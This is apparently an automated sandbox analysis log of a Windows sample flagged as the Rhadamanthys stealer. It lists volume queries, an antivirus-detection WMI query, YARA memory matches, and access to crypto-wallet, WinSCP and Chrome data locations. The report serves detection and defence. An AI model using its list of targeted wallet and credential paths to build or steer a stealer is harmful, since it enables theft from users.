Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files\Windows Media Player\wmprph.exe Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Windows Media Player\wmprph.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\dllhost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2794D0 GetCurrentProcessId,ProcessPrng,CreateNamedPipeW,GetLastError,CloseHandle,CloseHandle, 4_2_00007FF63D2794D0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D26E220 GetSystemTimePreciseAsFileTime, 4_2_00007FF63D26E220
Source: C:\Windows\System32\OpenWith.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\regsvr32.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information
barindex
Yara detected RHADAMANTHYS Stealer
Source: Yara match File source: 0000000E.00000003.1733264637.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1772221691.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1770896929.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1776058273.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1774245020.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1772517480.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1661729076.000000001BA01000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1751813778.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1744735797.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1741663241.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1752960096.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1764199832.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1773158578.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1758049624.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1767980994.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1739181531.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1745060493.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1765364016.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1774030054.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1730971445.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1759435128.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1749345129.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1744476159.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1743945250.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1748274287.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1627889710.000001F9DF920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1770471428.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1737974066.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1733891571.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1775675719.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1758603457.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1738781521.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1750663652.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1766830436.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1737361189.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1746053538.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1735264963.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1771728010.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1764871739.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1732324317.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.1602767929.00000000028D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1752123123.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1739761324.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1738314505.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1749877777.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1754168196.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1726579095.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1734444495.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1752709890.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1753586274.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1748873710.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1742093895.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1763763009.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1745501240.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1755359019.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1774918323.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1736566513.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1748590947.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1756177662.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1757743595.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1773734067.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1735678354.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1740296656.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1756708487.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1752460608.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1744204587.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1731959678.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1740765343.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1726579095.000001F9E0C91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1736978478.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1750934596.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1731676215.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1751248603.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1753303535.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1766516787.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1767428012.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1755616290.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1731420429.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1765992633.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1750138359.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1754962335.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1742638722.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1747838363.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1742967878.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1736196050.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1754590766.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1751538386.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1774468300.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1757113350.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1761379644.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1743292419.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Found many strings related to Crypto-Wallets (likely being stolen)
Source: OpenWith.exe, 0000000E.00000003.1774213689.000001F9E0234000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\Electrum-LTC\config
Source: OpenWith.exe, 0000000E.00000003.1774213689.000001F9E0234000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\com.liberty.jaxx
Source: OpenWith.exe, 0000000E.00000003.1774213689.000001F9E0234000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: passphrase.json
Source: OpenWith.exe, 0000000E.00000003.1774213689.000001F9E0234000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\Exodus
Source: powershell.exe, 00000003.00000002.1684222885.00007FFB4B530000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: sqlcolumnencryptionkeystoreprovider
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-Qt Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\Security Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e9edf720-d88f-46ea-8d95-7134a339b3c1 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store Jump to behavior
